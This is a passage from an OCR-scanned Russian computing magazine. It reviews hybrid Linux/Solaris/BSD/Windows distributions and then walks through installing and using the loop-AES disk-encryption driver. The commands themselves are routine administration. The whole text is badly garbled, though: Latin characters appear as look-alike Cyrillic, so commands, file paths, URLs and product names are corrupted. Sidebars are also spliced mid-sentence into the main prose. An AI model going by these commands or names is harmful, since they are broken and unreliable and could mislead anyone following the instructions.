версии 0.5 его еще не было) или образ для 
ѴМѵѵаге Ріауег. После загрузки регистрируемся 
в консоли как гооі; (без пароля), разбиваем хард 
при помощи Гсіізк и запускаем зузіпзЕ 

# зузіпзк 

ЗЗБ/Ыпих 0.5-20090707/2.6.29 
Іпзкаііег 

Аге уои зиге До іпзкаіі [у/Ы] ? 

Зекир Рііезузкет 

П о сл е ч е го будет выв еде н а та бл и ца ра зд ел о в 
с предлагаемымиточками монтирования. 

Чтобы изменить параметры раздела, следует 
ввести его номер (он указан в первой позиции 
таблицы). Раздел, который сейчас редактиру- 
ется, помечается значком У. Для перехода к 
следующему пункту нажимаем «х». Выбираем 
букву (а.сфт.Ь), соответствующую нужному 
действию: 

a. Тоддіе изе ккіз рагкікіоп — ис- 
пользовать этот раздел; 

с. Тоддіе тке2кз/ткзчлар члікЬ. кзск — 
запустить тке21з/ткзѵ^ар с проверкой 
кзск; 

1. Тоддіе кз куре ехк2/ехкЗ — изме- 
нить тип файловой системы ехк2 на 
ехкЗ и наоборот; 

т. Епкег/Скапде тоипк роіпк — изме- 
нить точку монтирования; 

b. СЬапде Ыоск зізе — изменить раз- 
мер блока. 

По окончании настройки разделов диска будет 
предложено указать активный раздел. Подтвер- 
дить установки можно буквой «I». Следующее 
меню предлагает выбрать устанавливаемые 
компоненты. Поумолчанию на хард копиру- 
ются: ядро, базовая система, компиляторы и 
маны. Если нужны исходники, жмем «8» и «х», 
чтобы перейти дальше. Указываем источник 
установки, поумолчанию СО-ПОМ, но если 
будут обнаружены сетевые карты, то они также 
появятся в списке. Начинаем установку. После 
того, какфайлы скоп и руются, дважды вводим 
пароль рута. Воти все. Переченьутилит, вклю- 
ченных в дистрибутив, можно найти на странице 
«СоттапсІ Ызі» ( ѵѵѵѵѵѵ.рІаіЬоте.сопп/зиррогі/ 
55сШ пих/сот та псІ.ЫтІ ). Дальнейшие действия 
очень просты. Получаем сетевые настройки, 
если в сети используется ОНСР-сервер: 
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• 550/Ыпих поддер- 
живаеттри аппарат- 
ные архитектуры: 

І386, Мірзеі 

и РоѵѵегРС. 

• Мини-сервера 
ОрепМісгоЗегѵег 

и ОрепВІоскЗ могут 
быть использованы 
в качестве МаіІ/ѴѴеЬ/ 
ЗСИ/ѴоІР/ЮАР/ѴРІЧ/ 
ОНСР-сервера или 
роутера. 

• Первоначальное 
название Ыехепіа 
Соге Ріа Попп — 
ЫехепіаОЗ. 

• В базовую поставку 
Ыехепіа Соге 
РІаНогт 2.0 включе- 
ны текстовый редак- 
тор ѵіт, консольный 
оконный менеджер 
зсгееп и утилита 
арі-сіопе, являюща- 
яся надстройкой над 
арі-деі. 

• Учитывая малое 
количество докумен- 
тации по ІЧСР, можно 
сказать, что дистри- 
бутив ориентирован 
больше на специа- 
листов или желаю- 
щихтаковыми стать, 
чем на новичков. 

• МігОЗ ВЗО [ Ыірз:// 
ѵѵѵѵѵѵ.ппігЬзсІ.огд ) ос- 
нована на ОрепВЗО 
и ЫеіВЗО. 

• Проект Оепіоо/ 
ЕгееВЗО (Оепіоо/ 
ЕВ50, 6/ЕВ50, 
деп1:оо.огд/ргоі/еп/ 
депІоо-аЙ/ЬзсіЛЬзсІ ]. 
не успев получить ста- 
тус официального, был 
заморожен разработ- 
чиками из-за несов- 
местимости лицензий. 
Хотя на зеркалах все 
необходимое для его 
установки есть. 
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** То ли ѴѴІпсІоѵѵз.толи Ыпих... Вот такой он апсІЫпих 





# йЬсІіепС еСЬО 

Чтобы указать статический ІР, редактируем іІсопіід.еіНХ: 

# есЬо "іпеС 192.168.1.100 пеСшазк 
255.255.255.0 Ъгоабсазк 192.168.1.255" > /екс/ 
іісопіід . еккО 

Теперь шлюз и адрес ОЫЗ-сервера: 

# еско "192.168.1.1" > сак /екс/тудаке 

# ескю "пашезегѵег 192.168.1.1" /екс/гезоіѵ. 
сопк 

Каквариант, можнозанести все эти настройки в/еіс/гс. со пР 
Для примера установим веб-сервер іШрсІ [ ѵѵѵѵѵѵ.асппе.сопп/ 
зоКѵуагеЛЬНрсІ І: 

# ссі /изг/згс/сопкгіЪ/кЪ.ккрс1 

# Ьтаке && Ьтаке іпзкаіі 

Дистрибутивный файл будет автоматически скачанс ЙрУ/Рр. 
рІаІботе.со.ір/риЬ/ззсШп их/0. 5-20090707/6 ізКіІез . распако- 
ван, скомпилирован иустановлен. 

Собрать роутер (как вариант, почтовый, веб, ОНСР, 
ЗОИ, ѴоІР, ЮАР, ѴРЫ сервер] на старом компьютере 
с помощью 55 О/Ыпих — минутное дело. Единст- 
венный минус дистрибутива — малое количество 
драйверов, встроенных в дефолтное ядро, а значит, 
без пересборки не обойтись. Ксожалению, на сайте 
проекта по поводу поддержки оборудования ничего 
не сказано. «Железо» приходится подбирать методом 
научного тыка. 



0РЕМ50І.АШ5 + цвимти = 
МЕХЕМТАСОКЕРІ.АТРОКМ 

Проект Ыехепіа Соге РІаЛогт [ ѵѵѵѵѵѵ.пехепіа.огд ] начат более 
двух лет назад с целью создания свободной ОС на базе 
ОрепЗоІагіз, которую можно было бы использовать как на 
серверах, так и десктопах. N С Р также является гибридом; на 
этот раз сочетаниетаково — ядро ОрепЗоІагіз и программное 
окружение ІДэипІи 8.04. Для обычного пользователя подоб- 
ный симбиоз интересен тем, что можно изучатьтехнологии 
ОрепЗоІагіз (в ЫСР имеется полноценная поддержка файло- 

X 

Фишка дистрибутива Ргасо — РгасоРКО 




вой системы 2Е5, изолированных зон, ИТгасе ит.д.), работая 
в привычной среде и не испытывая недостатка в утилитах. 
Размер репозитория программ, созданного на базеубунтовс- 
кого«Нагс!у Негоп», — более ІЗтысяч пакетов. 

Текущая версия 2.0 основана на сборке ОрепЗоІагіз Ьиіісі 1 04+с не- 
которыми критическими исправлениями. Дистрибутив включаетв 
себя последние на момент релиза версии компонентов:Х.Огд,бркд/ 
АРТ, 6СС, Віпиіііз, Сопеиіііз, Регі, Руібоп, РиЬу СИ и ОТК+. Из ряда 
нововведений стоит отметить появление поддержки 5МР(5еіл/ісе 
МападетепіРасіШу]длятакихсерверныхприложений,какАрасЬе, 
МуЗСИ, РозІдпеЗОЦ Ехіт. Служба ЗМРявляется заменой старичку 
іпііи обеспечиваетпараллельный за пускслужбс поддержкой 
зависимостей, автоматический перезапускпри сбое, возможность 
работы отнепривилегированнойучетной записи и многое другое. 
ЫСР 2.0 распространяется в виде 150-образа размером 506 
Мб. Установка возможна на любой х86 компьютер, имеющий 
256 Мб ОЗУ. Кроме жесткого диска, поддерживается установка 
на ІІЗВ-флешку, о чем после загрузки рапортует«Ыехеп1:аСоге 
I пзіаііег». Сам инсталлятор обладает псевдографическим 
интерфейсом, но для подготовленного пользователя про- 



Ыпих 

ЦпИіесІ 

Кегпеі 

Помимо того, что ѴѴіпсіоѵѵз 
учат понимать Ііпих при 
помощи соііпих, есть и 
проекты с обратной зада- 
чей. Кроме всем известно- 
го ѴѴіпе Гмллл/у.уѵіпеЬд.огщ) , 
представляющего собой 



«ЭМУЛЯТОР» ѴѴІПСІОѴѴ5 АРІ, 

существует еще один не 
менее интересный проект 
— Ыпих ШШеб Кегпеі 
ГШКили Ьопеепе. Іопчепе, 

зГ.пег) . Задача ШК — 
обеспечить возможность 
использования в Ыпих 
драйверов и приложений, 
написанных для ѴѴіпсІоѵѵз, 
причем результат — боль- 
ше чем эмуляция. Команда 
разработчиков, спонсируе- 
мая китайской компанией 



Іпзі§та ТесЬпо1о§у Со., 
должна обеспечить полную 
бинарную совместимость 
программ и научить Ыпих 
поддержке всех основных 
механизмов ѴѴіпбоѵѵз (сис- 
темные вызовы, реестр, 
механизмы управления 
процессами и виртуаль- 
ной памятью) . В качестве 
основы ѴѴіп32 АРІ исполь- 
зован код ѴѴіпе, КеасЮЗ, 
ЫПІЗѵѵтаррег и Кегпеі- 
ѴѴіп32. Причем, учитывая, 



что ШКявляется все-таки 
надстройкой над ѴѴіпе, он 
следует его возможностям. 
Другими словами, все, что 
доступно в ѴѴіпе, можно 
сделать через ШК (а если 
чего-то нет, придется по- 
дождать) . Реализован ШК 
в виде модулей и патчей 
кядруііпих. Примеча- 
тельно, что размер самих 
патчей совсем небольшой. 
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Инсталлятор Ыехепіа Соге Ріа^огт хоть и не балует графикой, недостаточно прост 
в использовании 
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цессустановки трудностей не составит. Указываем раскладку 
клавиатуры, регион, выбираем диски размечаем. Доступен 
вариант разметки автоматом. Далее дистрибутив распа- 
ковывается на хард, вводим два раза пароль рута, заводим 
обычного пользователя и настраиваем сеть. Все! 
Послеустановки в системе минимум приложений, но, учи- 
тывая наличие бркд/арС это не проблема. Например, чтобы 
получить рабочую среду на базеХРсе, пишем: 

# арС-деТ ирсІаТе 

# арР-деТ іпзРаІІ хРсе4 хогд 

Необходимостьдопиливания системы послеустановки не 
всем пришлась по вкусу. В результате появился польский 
проект ЗіюгтОЗ [ ѵѵѵѵѵѵ. гіогтоз. о гд ). первый релиз которого 
получил название «Нагбу Наіі». ЗіюгтОЗ предлагает деск- 
топ-вариант ІЧСР, работающий из коробки. Послеустановки 
пользователь получает рабочий стол ХРСе 4 с большим коли- 
чеством приложений (АЬіѵѵогб, Опитегіс, Сітр, ПЬуіЛтЬох, 
Рігебох, Зупарбс ит.п.). 

ивиыти+ѵѵімооѵѵ5=Амоимих 

Дистрибутив апсЫіпих [ ѵѵѵѵѵѵ.апбііпих.огд ) создан на базе 
ІІЬипІи. Возможно, ничего необычного в этом и не было бы 
(решений, базирующихся на ІІЬипіи, сегодня предостаточно, 
иудивитьими кого-либо сложно], нодело втом, чтоапсЫіпих 
предназначен для запуска из-под 32-битных версий ѴѴіпсІоѵѵз, 
построенных на ядре І\ІТ (2000/ХР/2003/Ѵіз1:а/5е7еп]. Если 
быть точнее, то дистрибутив полностью интегрирует прило- 
жения Ьіпих во враждебную для пингвина среду ѴѴіпсІоѵѵз. 
Пользователь получаетвее Ыпих-приложения без обычного 
рабочего стола, а утилиты из разных сред могут взаимодейс- 
твовать между собой. Возможна доустановка приложений при 
помощи АРТ/Зупарбс. 

Основой апсЫіпих послужил нашумевший после своего появ- 
ления в 2004 году проект Соорегабѵе 1_іпих [ ѵѵѵѵѵѵ.соііпих.огд ]. 
Он представляет собой специальный драйвер, позволяющий 
запускать ядро Ьіпих одновременно с другой ОС на одной и 
той же машине, без использования средств виртуализации. 
Работает со Ыпих в своем адресном пространстве; драйвер 
по мере необходимости «переключает компьютер» между 
соЬіпих и ѴѴіпсІоѵѵз. Производительность в итоге на порядок 
выше, чем при использовании виртуальной машины, и 
практически сравнима с реальным запуском приложения 
в Ыпих. Остальные составляющие соЫпих: Хтіпд [ ѵѵѵѵѵѵ. 
зІтаідЫтиппіпд.сот/ХппіпдМоІюз ) — это Х-сервер для 
ѴѴіпсІоѵѵз, собранный при помощи МіпОѴѴ(нэйтивный порт 
ОСС под ѴѴіпсІоѵѵз. ѵѵѵѵѵѵ.ппіпдѵѵ.огд ]. и кроссплатформенный 
звуковой сервер РиІзеАисІіо [ ѵѵѵѵѵѵ. риізеаисііо.огд ). 
Системныетребования апсЫіпих невысоки. Объем ОЗУ 
определяется используемой версией ѴѴіпсІоѵѵз. Такдля 



запуска в ѴѴіп2к/ХР/2кЗ достаточно всего 128 Мб (лучше 192 
Мб]. Дискдолжен быть отформатирован в ІЧТР5 (РАТ32 не 
поддерживает файлы более 4 Гб]. В настоящее время проект 
предлагает две версии дистрибутива: с рабочим столом КОЕ 
и ХРСе; для установки понадобится, соответственно, 4.5 и 2.5 
Гб свободного места. 

Ди стр и бути в доступен в виде ехе-шника (дожили], его установка 
стандартна для ѴѴіпсІоѵѵз. Походу предстоитуказать, сколько 
памяти можно отдать под соЫпих. Затем идут настройки Х-сер- 
вера, например, можно выбратьспецифическое разрешение, 
но лучше ничего нетрогать и оставить, какесть. Включаем звук, 
выбираем один из шести вариантов запуска, указываем логин и 
пароль для входа, методдоступа к разделам ѴѴіпсІоѵѵз. Далее все 
просто: ты получаешь доступ к приложениям Ыпих из ѴѴіпсІоѵѵз, 
запуская их по мере необходимости. Если чего-то не хватает, к 
твоим услугам Зупарбс. Пиктограммы с Ыпих приложениями 
размещаются на панели задач, рядом с программами ѴѴіпсІоѵѵз. 

В меню появляются дополнительные пункты, позволяющие 
открыть каталог при помощи файлового менеджера (ТЬипаг в 
ХРСе), некоторыетипы файлов сопоставляются Ыпих-прило- 
жениям. Так что, апсЫіпих — хороший повод познакомиться с 
утилитами ІІпіх или перейти на 01\Ю софт. 

Кроме апсЫіпих, на основетехнологий соЫпих построены 
дистрибутив Тороіоді-Ііпих ( іюроІюді-І-іпих.зГпеі: ). использую- 
щий в качестве базовой системы слаку, и свободная система 
с открытым кодом РеасЮЗ [ ѵѵѵѵѵѵ. геасіоз.огд ]. разработчики 
которой планируют создать полноценную замену ѴѴіпІЧТ. 

йЕВІАЫ С СЕРДЦЕМ ДЕМОНА 

История знает несколько попыток скрестить Ыпих и ВЗИ- 
системы в разных комбинациях, но не все они удачны. 
Особенно в части экспериментов популярен ОеЬіап — ОеЬіап 
СІ\ІІ)/І\Іе1:В50 [ ѵѵѵѵѵѵ.беЫап.огд/роПз/пеіЬзб ]. ОеЬіап ОІЧІІ/ 
кРгееВЗО ( ѵѵѵѵѵѵ.беЫап.огд/роНз/кЫееЬзб-дпи ) и ОеЬіап ОІ\Ю/ 
РгееВЗО. Последний проект приказал долго жить, поэтому о 
нем говорить не будем. Первые два в качестве ядра исполь- 
зуют соответственно кернелы из ІЧеШЗО и РгееВЗО (буква 
«к» в кРгееВЗО как раз и обозначает кегпеі, чтобы отличать от 
ОеЬіап ОЫІІ/РгееВЗО]. ОеЬіап 0І\Ы)/І\Іе1:В50 наилучшим об- 
разом подходит для запуска на экзотических платформах, не 
поддерживаемых Ьіпих’ом (І\Іе1:В50 славится своей работос- 
пособностью практически на любом «железе»]. Что касается 
ОеЬіап 0І\Ы/кРгееВ50,то после 10-ти лет разработки проект 
особыхуспехов не имел, и результат, можно сказать, плачев- 
ный. Есть проблемы с определением оборудования, мало 
документации, работы ведутся вяло. Если все-таки желаешь 
познакомиться с ОеЬіап О І\ІІІ/к РгееВЗО, присмотрись кбіпд 
(Оіпд Із Ыоібіпд. дІіЬс-ЬзсІ.аІіоіЬ.сІеЬіап.огд/діпд ). который 
предлагает ЬіѵеСО-образ этого дистрибутива, т 
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Сайты проектов: 
ЗЗО/Ьіпих — ѵѵѵѵѵѵ. 
рІаіЬоте.сот . 
Огасо — ѵѵѵѵѵѵ. 
сЫасоІіпих.огд . 
ІЧехепІю Соге 
РІаДогт — ѵѵѵѵѵѵ. 
пехепіа.огд . 
апсЫіпих — ѵѵѵѵѵѵ. 
апсШпих.огд . 
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Благодаря АРТ, 
довести ІМехеп1:а 
Соге Ріаиргт до 
нужной кон- 
диции очень 
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■ ЕВГЕНИЙ ЗОБНИН /20ВМІЫгабМАИ.С0М / 



Шифруемся 

помаленьку 

Шифрование диска в Ыпих 
с помощью Іоор-АЕ5 

В нашем повсеместно мобилизованном мире поте- 
рять информацию проще простого: выронил флешку 
из кармана, украли телефон, забыл ноутбук. Все это 
случается ежедневно и можетсильно подпортить 
жизнь владельцуустройства, если он заранее не по- 
заботился о защите важной информации. А защитить 
ее можно только двумя способами: надежно спрятать 
или зашифровать. 




Д ля Ыпих в разные времена было 

разработано множество различных 
средств шифрования дисковых 
разделов. С ходу можно вспомнить 
несколько проектов: коммерческий ТшеСгурЕ 
показывающий отличную производительность 
в ѴѴіпбоѵѵз, но отстающий ото всех остальных в 
Ыпих; встроенный в ядро и постоянно критикуе- 
мый за нестойкость бт-сгурЕ элегантный, нето- 
ропливый (поскольку выполняется в окружении 
пользователя и работает поверх файловой 
системы] епсіъ. В стороне отсписка зачастую 
оказывается один из старейших, производи- 
тельных и надежных шифрующих Ыпих-драйве- 
ров — Іоор-АЕ5. 

ДРАЙВЕР Ю0Р-АЕ5 

Сторонний драйвер Іоор-АЕ5 представляет 
собой, как нетрудно догадаться, модификацию 
стандартного Ыпих-драйвера Іоор.ко. Того само- 
го, который используется для так называемого 
кольцевого подключения различных сущностей 
в качестве виртуальных блочныхустройств (на- 
пример, 150-образов]. В отличиеоторигинала, 
создающего тонкую прослойку между чем-либо 
и виртуальным устройством, 1оор-АЕ5еще и 
производитмодификацию пропускаемых через 
негаданных, шифруя записываемую или читае- 
мую из устройства информацию. Это делает его 
универсальной системой шифрования любой 
информации, будьто файлы (подключенные с 



помощью «тоипі: -о Іоор»], дисковые разделы, 
ВАЮ-тома, своп-области, флеш-брелки ит.п. 
Шифруя раздел с помощью этого драйвера, 
пользователь получает что-то вроде переход- 
ника в виде Іоор-устройства. Без него получить 
доступ к реальному устройству невозможно. 
Подготовленный читатель может сказать, что 
Іоор-АЕ5 просто «не нужен», потому как ваниль- 
ное ядро уже давно включает в себя драйвер, 
способный шифроватьлюбые данные (тот самый 
бт-сгурф да еще и поддерживающий свыше 
десятка различных алгоритмов. И будет не прав. 
Конек Іоор-АЕ5 — в непревзойденной скорости 
работы, многоуровневой системе безопасности 
и интеграции со стандартными утилитами О N11/ 
Ыпих (дрд, тоипі;]. Эагі Виизи, автор 1оор-АЕ5, 
неоднократно указывал на недостатки других 
систем шифрования, доступных в Ыпих, благо- 
даря чему были исправлены серьезные пробле- 
мы безопасности ТгиеСгурІ: и бт-сгурЕ Даже 
сегодня, когда многие из проблем бт-сгурЕ на 
которые, не смущаясь, показывали пальцем 
эксперты по безопасности, уже решены, Іоор- 
АЕЗтаки продолжает за ни мать место наиболее 
безопасного и производительного решения. 
Основная причина, по которой 1оор-АЕ5 часто 
забываютупомянуть и боятся с ним связы- 
ваться, заключается в нетривиальном способе 
установки, включающем в себя необходимость 
перекомпиляции ядра и модификации ряда 
системных утилит. Во многом это объясняется 



отсутствием внятных пошаговых руководств 
как в рунете, так и в западных источниках. Мы 
постараемся восполнить информационный 
пробел и в деталях раскроем тон кости установки 
и использования драйвера 1оор-АЕ5. 

ПОДГОТОВКА К УСТАНОВКЕ 

Пакет 1оор-АЕ5 состоит из четырех компонентов: 
модифицированного драйвера Іоор.ко, набора 
патчей для системных утилит, патча для ядра 
Ыпих и коллекции модулей, обеспечивающих 
поддержку а л го ритм о в шифрования ВІоѵѵЕзЬ, 
Зегрепі: и ТѵѵоЕзЬ. Первые два компонента нам 
понадобятся в любом случае, а воттретий и 
четвертый совсем не обязательны. Во-первых, 
драйвер можно собрать и отдельно от ядра, а во- 
вторых, используемый поумолчанию алгоритм 
АЕ5 — один из лучших. Менять его на какой-то 
другой не имеетсмысла. 

В качестве подопытной системы будем исполь- 
зовать ди стр и бути в ІІЬипШ 9.04, построенный на 
ядре 2.6.28.9, но главное — учитывать номера вер- 
сий необходимого ПО и следовать инструкциям. 
Для начала получим исходники ядра Ыпих (от 
2.0 до 2.6.30, драйвер работает с любым из них). 
Для ІІЬипІш выполняем приведенную ниже 
последовательность действий; для других 
дистрибутивов — устанавливаем необходимый 
для сборки ядра комплект пакетов, переходим 
в каталог/изг/згс и с помощью ѵѵдеі: получаем 
ядро с кегпеі.огд. 
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X Процесс тестирования 
[оор-АЕ5 



# ссі /изг/зге 

# мдек ІШкр: //Іоор-аез . зоигееіогде. 
пек / Іоор-АЕЗ -Іакезк . Таг . Ьг2 

# Саг -хз С 1оор-АЕЗ-1акезк . Саг .Ъг2 

# ссі 1оор-АЕ8-ѵЗ . 2д 

# таке сіеап 



# таке ЫШХ_801ІКСЕ= /изг/зге /Ііпих- 



# арС-деС іпзСаІІ Ііпих-зоигсе 

# арС-деС ІпзСаІІ ЬиіШ-еззепСіаІ 
псигзез-сіеѵ СакегооС 

# арС-деС ІпзСаІІ кегпеі-раскаде 

Распакуем исходники, скопируем конфигу- 
рационный файл текущего ядра (он может 
называться и по-другому] и запустим конфи- 
гуратор: 

# ссі /изг/зге 

# Саг -х^С 1іпих-зоигсе-2 . 6 . 28 . Саг . 
Ьз2 

# ср /ЬооС/сопСід-2 . 6 . 28-11-депегіс 
. /1іпих-зоигсе-2 .6.28/. сопСід 

# ссі . /1іпих-зоигсе-2 . б . 28 

# таке теписопСід 

Единственное, что мы должны сделать — убрать 
из ядра поддержку драйвера Іоор, чтобы он 
не конфликтовал с Іоор-АЕЗ: Цеѵісе Цгіѵегз 
ВІоск сіеѵісез ЕоорЬаск беѵісе зиррогі 
п (или С0ЫЕІ6_ВЕК_0ЕѴ_Е00Р=п в конфи- 
гурационном файле]. Также добавим метку к 
новому ядру, чтобы дать установщику Іоор-АЕЗ 
понять, что в текущем ядре он нам не нужен, а 
нужен в новом: ОепегаІЗеІир -> Еосаіѵегзіоп -> 
«-поіоор» (СОЫ РІѲ_Е0САЦ\/ЕР5І0 Ы=-по1оор] . 
Если же ты намерен использовать Іоор-АЕЗ для 



шифрования корневого раздела, то убедись, 
что опция ОепегаІЗеІир I піііаі РАМ ІіІезузІет 
апб РАМ бізк ( і п іі га т і з/ і п і 1: гсі ] зиррогі (С0ЫЕІ6_ 
ВЕК_0ЕѴ_ІЫ ІТРО] включена. И вкомпилируй 
необходимые ЮЕ/5АТАдрайвера и поддержку 
файловой системы корневого раздела в ядро 
(не модулями!]. Собираем и устанавливаем 
ядро (рецепт для ЦЬипІи]: 

# таке -кр кд сіеап 

# таке-кркд -іпіСгсІ кегпе1_ітаде 
кегпе1_1іеас1егз 

# ссі . . 

# сіркд -і 1іпих-ітаде-2 . б . 2 8 . 9- 
поіоор* 

Рецепт для всех остальных дистрибутивов: 

# таке 

# таке тос1и1ез_іпзка11 

# ср агсЬ/і38б/ЬооС/Ь2Ітаде /ЬооС/ 
ѵтІіпиг-2 .6.28. 9-по1оор 

Редактируем /Ьооі/дги Ь/дгиЬ.сопб, чтобы 
показать загрузчику новое ядро (для ІІЬипІи не 
требуется], и отправляем комп на перезагрузку. 

УСТАНОВКА 

Загрузившись с новым ядром, приступаем к 
установке драйвера Іоор-АЕЗ: 



зоигсе-2 .6.28 

Подчищаем исходники ядра: 

# ссі /изг/згс/1іпих-зоигсе-2 . б . 28 

# таке сіеап 

И переходим ксборке и установке модифициро- 
ванныхутилиттоипі, итоипі, Іозеіир, зѵѵароп, 
зѵѵароЛ. Все они распространяются в пакете 
иІіІ-Ііпих, но в стандартном виде не подходят 
для управления шифрованными дисковыми 
разделами и зѵѵар-областями. Поэтому их 
придется пропатчить: 

# ссі /изг/зге 

# ѵ/дек Ъ.ккр : / /шт . кегпеі . огд /риЬ/ 
1іпих/икі1з/икі1-1іпих-пд/ѵ2 . 15/ 
икі1-1іпих-пд-2 . 15 . 1 . Саг .Ът.2 

# Саг -хз 1 икі1-1іпих-пд-2 . 15 . 1 . каг . 
Ьг2 

# ссі икі1-1іпих-пд-2 .15.1 

# раксЪ. -рі </изг/згс/1оор-АЕ8- 
ѵЗ . 2д/икі1-1іпих-пд-2 . 15 . 1 . сП! к 

# СЕЕАС8=" -02 -Ѵ?а11" . /сопкідиге 

# таке 81ІВВІЕ8=тоипк 

На момент написания статьи уже существовал 
пакет иііі-ііпих-пд версии 2.16, ноя выбрал 
2.1 5.1 просто потому, что версия Іоор-АЕЗ, 
доставшаяся мне, включала патч только для 
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В ЦЬипІи утилиты для управления Іоор-АЕЗ доступны из репозитория арі 



ибІ-Ііпих-пд-2.1 5.1 . Это очень важный момент, 
который нужно учитывать во время патчинга 
утилит. 

После того, какутилиты будут собраны, уста- 
новим их в систему (весь па кет уста на вливать 
опасно, поэтому мы вручную скопируем только 
необходимые утилиты] : 

# ссі шоипС 

# іпзкаіі -т 4755 -о гооС тоипк итоипС 
/Ьіп 

# іпзкаіі -ш 755 Іозекир зѵѵароп /зЪіп 

# гш -1 /зЪіп/зѵѵароіШ 

# 1п -з /зЪіп/зѵѵароп /зЬіп/зѵ^аро^^ 

Наконец, протестируем Іоор-АЕЗ на работоспо- 
собность: 

# ссі /изг/згс/1оор-АЕ8-ѵЗ . 2д 

# шаке кезкз 

Если в самом конце на экране появится сообще- 
ние ***Тез1: гезиіізок***, значит, теперь у нас 
есть готовый к работе Іоор-АЕЗ. Иначе все шаги 
установки придется повторить. 

СЦЕНАРИЙ 1. ШИФРОВАНИЕ 
5ѴѴАР- РАЗДЕЛА 

Шифрование зѵѵар- раздела — процедура 
необязательная, но чрезвычайно важная. 

Дело в том, что текущие да иные утилиты дрд, 
используемой Іоор-АЕЗ для хранения и защиты 
ключей шифрования, не застрахованы от 
попадания в область подкачки. Это способно 
привести ктому, что при определенных обсто- 
ятельствах новый владелецтвоего ноутбука 
с может про парсить зѵѵар на наличие ключей, 
найти их и прочитать зашифрованный раздел 
с важными данными. Чтобы избежатьтакого 
позора, достаточно просто настроить шифро- 
вание зѵѵар-раздела с помощью одноразовых 
ключей. Для этого отключаем зѵѵар (зѵѵароіі 
-а] и добавляем в/еШЛзІаб примернотакую 
запись: 



/сіеѵ/МаІ попе зѵѵар зѵѵ Доор=/с1еѵ/ 
Іоорі , епсгуркіоп=АЕ812 8 О О 

После этого забиваем зѵѵар-раздел нулями и 
инициализируем его: 

# сИ іП=/сіеѵ/ 2 его о:Е=/(іеѵ/Ткіа1 
Ьз = б4к сопѵ=покгипс 

# тк зѵѵар /сіеѵ/ТкіаІ 

Все, подключаем зашифрованный зѵѵар (будет 
шифроваться с помощью случайных ключей при 
каждом подключении): 

# зѵѵароп -а 

Кроме того, удаляем каталог/ѵаг/іод/ 
кзутоорз, чтобы тобргоЬе, загружающий 
модуль Іоор.ко, не ругался на невозможность 
записи в файловую систему, которая монти- 
руется в режиме чтения/записи уже после 
подключения зѵѵар: 

# гш “ГІ /ѵаг/іод/кзушоорз 

СЦЕНАРИЙ 2. ШИФРОВАНИЕ 
РАЗДЕЛА С ИСПОЛЬЗОВАНИ- 
ЕМ 65 СЛУЧАЙНЫХ КЛЮЧЕЙ 

Этотсценарий описываетиспользование Іоор- 
АЕЗ для шифрования одного из разделовжест- 
кого диска (/беѵ/зба2, точка монтирования/тпі] 
с использованием сгенерированных случайным 
образом 65 ключей (один блокданных — один 
ключ, по порядку]. Они будут за шифрованы с 
помощью дрд и помещены на съемный носитель 
(ІІЭВ-брелок, примонтированный к/тебіа/ 
изЬзбск]. 

1. Создадим 65 случайных ключей и зашифруем 
ихспомощьюдрд: 

$ Ьеасі -с 37 05 /сіеѵ/гапсіот | ииепсосіе 
-ш — | Ьеасі -п 66 I Саіі -п 65 I дрд 
--зутшеРгіс -а >/тес1іа/изЪзкіск/ 
кеу^ііе . дрд 



Вводим па роль для доступа к файлу ключей. 

2. Заполним раздел случайными данными. Для 
этого создадим псевдо-устройство /беѵ/Іоор2 
поверх/беѵ/зба2, указав, что мы используем ал- 
горитм АЕ3128 и файл ключей /тесІіа/изЬзбск/ 
кеубіе.дрд: 

# еско -п «ПаРоЛь» | Іозекир -р 0 -е 
АЕ3128 \ 

-К /тесііа/изЬзРіск/кеу^іІе . дрд / 
сіеѵ/1оор2 /с1еѵ/з(іа2 

Запишем в псевдо-устройство случайную 
информацию: 

# сісі іП=/сіеѵ/ 2 его о^=/сіеѵ/1оор2 
Ьз=4к сопѵ=покгипс 2>/сіеѵ/пи11 

Отключим псевдо-устройство: 

# Іозекир -сі /сіеѵ/1оор2 

3. Добавим вМсЛзіаЬ следующую запись: 

/сіеѵ/зсіа2 /шпР ехРЗ 
сіеРаиІРз^оаиРо, 1оор=/сіеѵ/ 

1оор2 , епсгуркіоп=АЕ8128 , дрдкеу=/ 
шесііа/изЬзРіск/кеуРіІе . дрд 0 0 

4 . Теперь на устройстве можно создать файло- 
вую систему: 

# ІозеРир -Е /с!еѵ/1оор2 

# шкРз -Р ехРЗ /сіеѵ/1оор2 

# ІозеРир -сі /с!еѵ/1оор2 

С помощью флага ‘-Е’ мы заставили Іозеіюр 
взять всю необходимую ей информацию из фай- 
ла /еІсЛзІаЬ, затем создали на псевдо-устройс- 
тве файловую систему ехЮ и удалили его. 

5 . Наконец, примонтируем файловую систему: 

# шоипР /тпР 

После этого в выводе команды «Іозеіир -а»ты 
должен увидеть информацию о псевдо-уст- 
ройстве /беѵЛоор2, которое подключено к/беѵ/ 
Ьба2. Проверку файловой системы необходимо 
производить применительно к Іоор-устройству: 

# ІозеРир -Е /сіеѵ/1оор2 

# Рзск -Р ехРЗ -Р -у /с!еѵ/1оор2 

# ІозеРир -сі /сіеѵ/1оор2 

СЦЕНАРИЙ 3. 

ШИФРОВАНИЕ /ТМР 

Третий сценарий демонстрирует одну из инте- 
реснейших функций Іоор-АЕЗ: автоматическое 
генерирование ключей с последующим создани- 
ем новой файловой системы на Іо о р -устройстве. 
Нужно это для разделов, хранящих временные 
данные. Нетсмысла создавать перманент- 
ные ключи и запоминать пароль для доступа к 
разделу, содержащему каталогЛтр, который при 
следующей перезагрузке будет очищен. 
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Исходники модуля Іоор-АЕБтак- 
же доступны в ЦЬипіи 9.04 



» иЬипіи » Раскаде іаипгѵ » асішіп » Іоор-аез-зоигое 



[ Зоигсе: Іоор-аеа ] 



[ сіаррег ] [ іпЕгеріс! ] [ {аипіу ] [ кагтіс ] 



Раскаде: Іоор-аез-зоигсе (3.2с-2) [ипіѵегзе] 



во и гее Іог Іоор-АЕ5 епегурйоп тогіиіез 

ТІііЕ раскаде сотаіпз зоигее сойе о! №е Іоор-АЕЗ ІоайаЬІе кегпеі тосШІез Ьг 
Ыпих 2.0 - 2.6. Іі сап Ье иБей ѵѵіІЬ тосІиІе-азбІБШпІ, таке-кркд ог згапсі-аіопе 
Іо Ьиііс) Іоор-АЕЗ тосіиіе раскадез. 

Іоор-АЕ5 сап Ье изей Ш епегурі сіізк рагШіопз, гетоѵаЫе плесІіа^Бѵѵар зрасе 
апсі оІЬег сіеѵісез. К ргоѵісіез теазигез Ш зІгепдІЬеп СЬІ? епегурйоп: 
